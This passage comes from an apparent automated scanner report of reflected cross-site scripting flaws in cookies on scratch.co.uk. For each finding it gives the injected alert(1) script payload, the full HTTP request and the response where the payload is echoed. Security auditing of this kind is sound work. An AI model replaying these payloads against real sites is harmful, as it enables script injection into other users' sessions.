The value of the currency cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21696"%3balert(1)//58111e9164 was submitted in the currency cookie. This input was echoed as 21696";alert(1)//58111e9164 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(1)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=21696"%3balert(1)//58111e9164; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.8.8.1305550735270; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; PHPSESSID=eiture7mb7g66oo3tttam6nfm5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:59:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: currency=21696%22%3Balert%281%29%2F%2F58111e9164; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:59:19 GMT; path=/
Content-Type: text/html
Content-Length: 11229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<script type="text/javascript">
$(document).ready(function() {
flashembed("middleflash", {src: "/images/scratch3a.swf?clickTag=javascript:openScratch('21696";alert(1)//58111e9164', 'ENG', 'direct-173|193|214|243');", w3c: true, wmode: "transparent"}, {
monthlyprizetext: 'Won Last Month',
               monthlyprize: '53,521,715',
               topprizetext: 'Scratch 2 to Win',
       
...[SNIP]...

3.150. http://scratch.co.uk/ [currency cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the currency cookie is copied into a JavaScript rest-of-line comment. The payload 161fb%0aalert(1)//2182f944140 was submitted in the currency cookie. This input was echoed as 161fb
alert(1)//2182f944140
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(1)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=USD737fc%22%3Balert%281%29%2F%2F814391c7445161fb%0aalert(1)//2182f944140; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.8.8.1305550735270; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; PHPSESSID=eiture7mb7g66oo3tttam6nfm5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:59:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:59:20 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:20 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%281%29%2F%2F814391c7445161fb%0Aalert%281%29%2F%2F2182f944140; expires=Wed, 15-Jun-2011 12:59:20 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:59:20 GMT; path=/
Content-Type: text/html
Content-Length: 11477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
e="text/javascript">
$(document).ready(function() {
flashembed("middleflash", {src: "/images/scratch3a.swf?clickTag=javascript:openScratch('USD737fc";alert(1)//814391c7445161fb
alert(1)//2182f944140
', 'ENG', 'direct-173|193|214|243');", w3c: true, wmode: "transparent"}, {
monthlyprizetext: 'Won Last Month',
               monthlyprize: '53,521,715',
               topprizetext: 'Scratch 2 to Win',
       
...[SNIP]...

3.151. http://scratch.co.uk/ [lang cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the lang cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74696"%3balert(1)//2bb8cf6f796 was submitted in the lang cookie. This input was echoed as 74696";alert(1)//2bb8cf6f796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG74696"%3balert(1)//2bb8cf6f796; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: lang=ENG74696%22%3Balert%281%29%2F%2F2bb8cf6f796; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:13 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<script type="text/javascript">
$(document).ready(function() {
flashembed("middleflash", {src: "/images/scratch3a.swf?clickTag=javascript:openScratch('USD', 'ENG74696";alert(1)//2bb8cf6f796', 'direct-173|193|214|243');", w3c: true, wmode: "transparent"}, {
monthlyprizetext: 'Won Last Month',
               monthlyprize: '$53,521,715',
               topprizetext: 'Scratch $2 to Win',
               top
...[SNIP]...

3.152. http://scratch.co.uk/ [lang cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2298d"><script>alert(1)</script>bfab089b01f was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG2298d"><script>alert(1)</script>bfab089b01f; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:11 GMT; path=/
Set-Cookie: lang=ENG2298d%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebfab089b01f; expires=Wed, 15-Jun-2011 12:29:11 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:29:11 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:11 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USD', 'ENG2298d"><script>alert(1)</script>bfab089b01f', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.153. http://scratch.co.uk/ [neogamesemail cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the neogamesemail cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af05e"><script>alert(1)</script>d33344ce0f7 was submitted in the neogamesemail cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deletedaf05e"><script>alert(1)</script>d33344ce0f7; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:27:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:27:03 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:27:03 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:27:03 GMT; path=/
Set-Cookie: neogamesemail=deletedaf05e%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed33344ce0f7%7E%7E; expires=Tue, 17-May-2011 00:27:03 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="http://www.hopa.com/visit.aspx?csi=10&amp;CorID=deletedaf05e"><script>alert(1)</script>d33344ce0f7&amp;SentDate=&amp;CorExpTime=&amp;" class="iframe" >
...[SNIP]...

3.154. http://scratch.co.uk/about/ [affiliate cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /about/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c841f"><script>alert(1)</script>c26133aa53 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /about/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243c841f"><script>alert(1)</script>c26133aa53; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243c841f%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ec26133aa53; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:03 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243c841f"><script>alert(1)</script>c26133aa53');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.155. http://scratch.co.uk/about/ [currency cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /about/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 102dc"><script>alert(1)</script>b576efef7c6 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /about/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP102dc"><script>alert(1)</script>b576efef7c6;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:55 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:55 GMT; path=/
Set-Cookie: currency=GBP102dc%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb576efef7c6; expires=Wed, 15-Jun-2011 12:29:55 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:55 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP102dc"><script>alert(1)</script>b576efef7c6', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.156. http://scratch.co.uk/about/ [lang cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /about/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f717"><script>alert(1)</script>9b4eec3d242 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /about/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG2f717"><script>alert(1)</script>9b4eec3d242; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: lang=ENG2f717%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9b4eec3d242; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:13 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG2f717"><script>alert(1)</script>9b4eec3d242', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.157. http://scratch.co.uk/contact/ [affiliate cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /contact/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94bc4"><script>alert(1)</script>062cf6e61a2 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contact/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C24394bc4"><script>alert(1)</script>062cf6e61a2; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C24394bc4%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E062cf6e61a2; expires=Wed, 15-Jun-2011 12:26:08 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:08 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:08 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:08 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 15000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|24394bc4"><script>alert(1)</script>062cf6e61a2');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.158. http://scratch.co.uk/contact/ [currency cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /contact/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fc52"><script>alert(1)</script>4e4316f61d0 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contact/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP3fc52"><script>alert(1)</script>4e4316f61d0;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:37 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:37 GMT; path=/
Set-Cookie: currency=GBP3fc52%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e4316f61d0; expires=Wed, 15-Jun-2011 12:30:37 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:37 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP3fc52"><script>alert(1)</script>4e4316f61d0', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.159. http://scratch.co.uk/contact/ [lang cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /contact/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cf9c"><script>alert(1)</script>10570ae66c1 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contact/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG7cf9c"><script>alert(1)</script>10570ae66c1; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:11 GMT; path=/
Set-Cookie: lang=ENG7cf9c%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E10570ae66c1; expires=Wed, 15-Jun-2011 12:30:11 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:11 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:11 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 15000

